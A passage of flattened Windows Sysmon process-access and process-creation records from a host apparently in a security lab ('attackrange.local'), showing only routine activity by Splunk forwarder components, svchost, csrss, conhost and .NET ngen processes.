Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.281{59A5CD1D-9183-6005-B602-00000000A301}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:47.077{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9183-6005-B502-00000000A301}4656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.061{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9183-6005-B502-00000000A301}4656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:47.061{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9183-6005-B502-00000000A301}4656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9184-6005-B802-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9184-6005-B802-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9184-6005-B802-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.765{59A5CD1D-9184-6005-B802-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.233{59A5CD1D-9184-6005-B702-00000000A301}17564824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9184-6005-B702-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
